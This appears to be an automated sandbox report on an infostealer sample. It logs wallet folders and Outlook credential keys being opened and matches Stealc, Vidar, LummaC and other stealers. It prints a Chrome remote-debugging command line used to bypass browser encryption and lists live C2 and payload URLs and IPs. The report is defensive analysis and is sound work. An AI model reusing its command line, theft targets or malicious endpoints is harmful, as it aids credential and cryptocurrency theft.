                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                                      Tries to steal Mail credentials (via file / registry access)
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                                      Source: Yara matchFile source: 0.3.5EfYBe3nch.exe.14b4ba0.1.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: 5EfYBe3nch.exe PID: 7268, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR

                                      Remote Access Functionality

                                      barindex
                                      Attempt to bypass Chrome Application-Bound Encryption
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                      Yara detected LiteHTTP Bot
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPED
                                      Yara detected LummaC Stealer
                                      Source: Yara matchFile source: Process Memory Space: 5EfYBe3nch.exe PID: 7268, type: MEMORYSTR
                                      Yara detected Poverty Stealer
                                      Source: Yara matchFile source: 00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000010.00000003.2453745116.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: iSHmPkn.exe PID: 7540, type: MEMORYSTR
                                      Yara detected Stealc
                                      Source: Yara matchFile source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000002.00000002.2273078519.0000000000731000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Yara detected Vidar stealer
                                      Source: Yara matchFile source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C540C40 sqlite3_bind_zeroblob,2_2_6C540C40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C540D60 sqlite3_bind_parameter_name,2_2_6C540D60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C468EA0 sqlite3_clear_bindings,2_2_6C468EA0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C540B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6C540B40
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C466410 bind,WSAGetLastError,2_2_6C466410
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C46C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6C46C050
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C466070 PR_Listen,2_2_6C466070
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C46C030 sqlite3_bind_parameter_count,2_2_6C46C030
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4660B0 listen,WSAGetLastError,2_2_6C4660B0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F22D0 sqlite3_bind_blob,2_2_6C3F22D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4663C0 PR_Bind,2_2_6C4663C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C469400 sqlite3_bind_int64,2_2_6C469400
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4694C0 sqlite3_bind_text,2_2_6C4694C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4694F0 sqlite3_bind_text16,2_2_6C4694F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C469480 sqlite3_bind_null,2_2_6C469480

                                      Mitre Att&ck Matrix

                                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                      Gather Victim Identity Information1
                                      Scripting                                      		Valid Accounts12
                                      Windows Management Instrumentation                                      		1
                                      Scripting                                      		1
                                      DLL Side-Loading                                      		11
                                      Disable or Modify Tools                                      		2
                                      OS Credential Dumping                                      		1
                                      System Time Discovery                                      		Remote Services1
                                      Archive Collected Data                                      		1
                                      Ingress Tool Transfer                                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                      CredentialsDomainsDefault Accounts2
                                      Native API                                      		1
                                      DLL Side-Loading                                      		1
                                      Extra Window Memory Injection                                      		11
                                      Deobfuscate/Decode Files or Information                                      		LSASS Memory12
                                      File and Directory Discovery                                      		Remote Desktop Protocol41
                                      Data from Local System                                      		2
                                      Encrypted Channel                                      		Exfiltration Over BluetoothNetwork Denial of Service
                                      Email AddressesDNS ServerDomain Accounts1
                                      Exploitation for Client Execution                                      		11
                                      Scheduled Task/Job                                      		12
                                      Process Injection                                      		3
                                      Obfuscated Files or Information                                      		Security Account Manager249
                                      System Information Discovery                                      		SMB/Windows Admin Shares11
                                      Email Collection                                      		1
                                      Remote Access Software                                      		Automated ExfiltrationData Encrypted for Impact
                                      Employee NamesVirtual Private ServerLocal Accounts2
                                      Command and Scripting Interpreter                                      		1
                                      Registry Run Keys / Startup Folder                                      		11
                                      Scheduled Task/Job                                      		12
                                      Software Packing                                      		NTDS1
                                      Query Registry                                      		Distributed Component Object ModelInput Capture1
                                      Application Layer Protocol                                      		Traffic DuplicationData Destruction
                                      Gather Victim Network InformationServerCloud Accounts11
                                      Scheduled Task/Job                                      		Network Logon Script1
                                      Registry Run Keys / Startup Folder                                      		1
                                      Timestomp                                      		LSA Secrets1071
                                      Security Software Discovery                                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                      Domain PropertiesBotnetReplication Through Removable Media3
                                      PowerShell                                      		RC ScriptsRC Scripts1
                                      DLL Side-Loading                                      		Cached Domain Credentials2
                                      Process Discovery                                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                      File Deletion                                      		DCSync461
                                      Virtualization/Sandbox Evasion                                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                      Extra Window Memory Injection                                      		Proc Filesystem1
                                      Application Window Discovery                                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                      Masquerading                                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron461
                                      Virtualization/Sandbox Evasion                                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                      Process Injection                                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                      Mshta                                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                                      Behavior Graph

                                      Hide Legend

                                      Legend:

                                      • Process
                                      • Signature
                                      • Created File
                                      • DNS/IP Info
                                      • Is Dropped
                                      • Is Windows Process
                                      • Number of created Registry Values
                                      • Number of created Files
                                      • Visual Basic
                                      • Delphi
                                      • Java
                                      • .Net C# or VB.NET
                                      • C, C++ or other language
                                      • Is malicious
                                      • Internet
                                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582701 Sample: 5EfYBe3nch.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 174 Found malware configuration 2->174 176 Malicious sample detected (through community Yara rule) 2->176 178 Antivirus detection for URL or domain 2->178 180 30 other signatures 2->180 10 5EfYBe3nch.exe 2 2->10         started        15 skotes.exe 2->15         started        17 cmd.exe 2->17         started        19 3 other processes 2->19 process3 dnsIp4 158 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->158 160 104.21.96.1 CLOUDFLARENETUS United States 10->160 128 C:\Users\user\...\DLTDCR8UJINP8YM8Y.exe, PE32 10->128 dropped 130 C:\Users\...\31FYMQUCQX14ZVCZU2HAYNV7V.exe, PE32 10->130 dropped 246 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->246 248 Query firmware table information (likely to detect VMs) 10->248 250 Found many strings related to Crypto-Wallets (likely being stolen) 10->250 260 4 other signatures 10->260 21 DLTDCR8UJINP8YM8Y.exe 36 10->21         started        26 31FYMQUCQX14ZVCZU2HAYNV7V.exe 4 10->26         started        162 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 15->162 164 104.18.10.31 CLOUDFLARENETUS United States 15->164 166 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 15->166 132 C:\Users\user\AppData\...\36ac23ea9d.exe, PE32 15->132 dropped 134 C:\Users\user\AppData\Local\...\av3EZhq.exe, PE32+ 15->134 dropped 136 C:\Users\user\AppData\Local\Temp\...\am.exe, PE32 15->136 dropped 140 12 other malicious files 15->140 dropped 252 Hides threads from debuggers 15->252 254 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->254 256 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->256 28 eXbhgU9.exe 15->28         started        30 cmd.exe 15->30         started        32 iSHmPkn.exe 15->32         started        138 C:\Temp\random.hta, HTML 17->138 dropped 258 Creates HTA files 17->258 38 2 other processes 17->38 34 cmd.exe 19->34         started        36 cmd.exe 19->36         started        40 2 other processes 19->40 file5 signatures6 process7 dnsIp8 148 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->148 150 127.0.0.1 unknown unknown 21->150 110 C:\Users\user\DocumentsbehaviorgraphIIIIJDHJE.exe, PE32 21->110 dropped 112 C:\Users\user\AppData\...\softokn3[1].dll, PE32 21->112 dropped 114 C:\Users\user\AppData\Local\...\random[1].exe, PE32 21->114 dropped 124 11 other files (7 malicious) 21->124 dropped 196 Detected unpacking (changes PE section rights) 21->196 198 Attempt to bypass Chrome Application-Bound Encryption 21->198 200 Drops PE files to the document folder of the user 21->200 216 7 other signatures 21->216 42 cmd.exe 1 21->42         started        45 chrome.exe 21->45         started        116 C:\Users\user\AppData\Local\...\skotes.exe, PE32 26->116 dropped 202 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->202 218 2 other signatures 26->218 48 skotes.exe 26->48         started        152 140.82.121.3 GITHUBUS United States 28->152 154 185.199.109.133 FASTLYUS Netherlands 28->154 118 C:\YQNZByFp\jyidkjkfhjawd.exe, PE32 28->118 dropped 204 Multi AV Scanner detection for dropped file 28->204 206 Machine Learning detection for dropped file 28->206 208 Adds a directory exclusion to Windows Defender 28->208 57 4 other processes 28->57 50 cmd.exe 30->50         started        53 conhost.exe 30->53         started        156 185.244.212.106 M247GB Romania 32->156 210 Antivirus detection for dropped file 32->210 220 2 other signatures 32->220 120 C:\Temp\8tA3oGhlP.txt, HTML 34->120 dropped 59 6 other processes 34->59 122 C:\Temp122LqFjPikt.txt, HTML 36->122 dropped 61 6 other processes 36->61 212 Suspicious powershell command line found 38->212 214 Tries to download and execute files (via powershell) 38->214 55 powershell.exe 38->55         started        file9 signatures10 process11 dnsIp12 222 Uses schtasks.exe or at.exe to add and modify task schedules 42->222 63 GIIIIJDHJE.exe 2 42->63         started        66 conhost.exe 42->66         started        168 192.168.2.4 unknown unknown 45->168 170 239.255.255.250 unknown Reserved 45->170 224 Suspicious execution chain found 45->224 68 chrome.exe 45->68         started        226 Detected unpacking (changes PE section rights) 48->226 228 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 48->228 230 Tries to evade debugger and weak emulator (self modifying code) 48->230 242 3 other signatures 48->242 106 C:\Temp\QZ7iCUD92.txt, HTML 50->106 dropped 108 C:\Temp\.gif, HTML 50->108 dropped 71 mshta.exe 50->71         started        73 5 other processes 50->73 75 2 other processes 55->75 172 172.67.179.160 CLOUDFLARENETUS United States 57->172 232 Multi AV Scanner detection for dropped file 57->232 234 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 57->234 236 Query firmware table information (likely to detect VMs) 57->236 244 5 other signatures 57->244 77 2 other processes 57->77 79 3 other processes 59->79 238 Suspicious powershell command line found 61->238 240 Tries to download and execute files (via powershell) 61->240 81 3 other processes 61->81 file13 signatures14 process15 dnsIp16 262 Detected unpacking (changes PE section rights) 63->262 264 Tries to evade debugger and weak emulator (self modifying code) 63->264 266 Hides threads from debuggers 63->266 83 skotes.exe 63->83         started        142 142.250.184.206 GOOGLEUS United States 68->142 144 142.250.185.195 GOOGLEUS United States 68->144 146 8 other IPs or domains 68->146 268 Suspicious powershell command line found 71->268 270 Tries to download and execute files (via powershell) 71->270 86 powershell.exe 71->86         started        89 powershell.exe 73->89         started        91 powershell.exe 73->91         started        272 Tries to detect sandboxes / dynamic malware analysis system (registry check) 75->272 274 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 75->274 93 483d2fa8a0d53818306efeb32d3.exe 79->93         started        95 conhost.exe 79->95         started        97 483d2fa8a0d53818306efeb32d3.exe 81->97         started        99 conhost.exe 81->99         started        signatures17 process18 file19 182 Hides threads from debuggers 83->182 184 Tries to detect sandboxes / dynamic malware analysis system (registry check) 83->184 186 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 83->186 126 C:\Users\...\483d2fa8a0d53818306efeb32d3.exe, PE32 86->126 dropped 101 483d2fa8a0d53818306efeb32d3.exe 86->101         started        104 conhost.exe 86->104         started        signatures20 process21 signatures22 188 Detected unpacking (changes PE section rights) 101->188 190 Tries to detect sandboxes and other dynamic analysis tools (window names) 101->190 192 Tries to evade debugger and weak emulator (self modifying code) 101->192 194 3 other signatures 101->194

                                      Screenshots

                                      Thumbnails

                                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                      windows-stand

                                      Antivirus, Machine Learning and Genetic Malware Detection

                                      Initial Sample

                                      SourceDetectionScannerLabelLink
                                      5EfYBe3nch.exe57%VirustotalBrowse
                                      5EfYBe3nch.exe68%ReversingLabsWin32.Spyware.Stealc
                                      5EfYBe3nch.exe100%AviraTR/Crypt.XPACK.Gen
                                      5EfYBe3nch.exe100%Joe Sandbox ML

                                      Dropped Files

                                      SourceDetectionScannerLabelLink
                                      C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe100%AviraTR/Spy.Gen8
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe100%AviraTR/Crypt.TPM.Gen
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe100%AviraTR/Spy.Gen8
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe100%AviraTR/Crypt.TPM.Gen
                                      C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe100%AviraTR/Crypt.TPM.Gen
                                      C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Temp\1027024001\am.exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe100%Joe Sandbox ML
                                      C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe100%Joe Sandbox ML
                                      C:\ProgramData\freebl3.dll0%ReversingLabs
                                      C:\ProgramData\mozglue.dll0%ReversingLabs
                                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                                      C:\ProgramData\nss3.dll0%ReversingLabs
                                      C:\ProgramData\softokn3.dll0%ReversingLabs
                                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exe8%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe26%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe65%ReversingLabsWin32.Ransomware.PovertyStealer
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll0%ReversingLabs
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe45%ReversingLabsWin32.Trojan.Pantera
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe30%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exe9%ReversingLabs
                                      C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe65%ReversingLabsWin32.Ransomware.PovertyStealer
                                      C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe30%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                      C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe9%ReversingLabs
                                      C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe26%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                      C:\Users\user\AppData\Local\Temp\1027024001\am.exe45%ReversingLabsWin32.Trojan.Pantera
                                      C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exe8%ReversingLabs
                                      C:\YQNZByFp\jyidkjkfhjawd.exe63%ReversingLabsWin32.Trojan.LummaStealer

                                      Unpacked PE Files

                                      No Antivirus matches

                                      Domains

                                      No Antivirus matches

                                      URLs

                                      SourceDetectionScannerLabelLink
                                      http://185.215.113.206/c4becf79229cb002.phpET100%Avira URL Cloudmalware
                                      http://185.215.113.16:80/mine/random.exeD0%Avira URL Cloudsafe
                                      http://185.215.113.206/68b591d6548ec281/freebl3.dllNQM100%Avira URL Cloudmalware
                                      http://185.215.113.206/c4becf79229cb002.phpmT100%Avira URL Cloudmalware
                                      https://fancywaxxers.shop/X100%Avira URL Cloudmalware
                                      https://fancywaxxers.shop/5100%Avira URL Cloudmalware
                                      https://fancywaxxers.shop/api92100%Avira URL Cloudmalware
                                      https://fancywaxxers.shop/K100%Avira URL Cloudmalware
                                      https://fancywaxxers.shop/e100%Avira URL Cloudmalware
                                      http://185.215.113.16/mine/random.exev0%Avira URL Cloudsafe
                                      http://185.215.113.206/68b591d6548ec281/nss3.dllnPm100%Avira URL Cloudmalware
                                      http://185.215.113.206/c4becf79229cb002.phpiS100%Avira URL Cloudmalware
                                      http://185.215.113.206/c4becf79229cb002.php-S0100%Avira URL Cloudmalware
                                      https://bridge.lg0%Avira URL Cloudsafe
                                      https://fancywaxxers.shop/apiM100%Avira URL Cloudmalware
                                      http://185.215.113.16/L0%Avira URL Cloudsafe
                                      http://185.215.113.16/steam/random.exeX0%Avira URL Cloudsafe
                                      https://fancywaxxers.shop:443/api100%Avira URL Cloudmalware
                                      https://fancywaxxers.shop/api)100%Avira URL Cloudmalware
                                      http://185.215.113.16/mine/random.exeZ0%Avira URL Cloudsafe
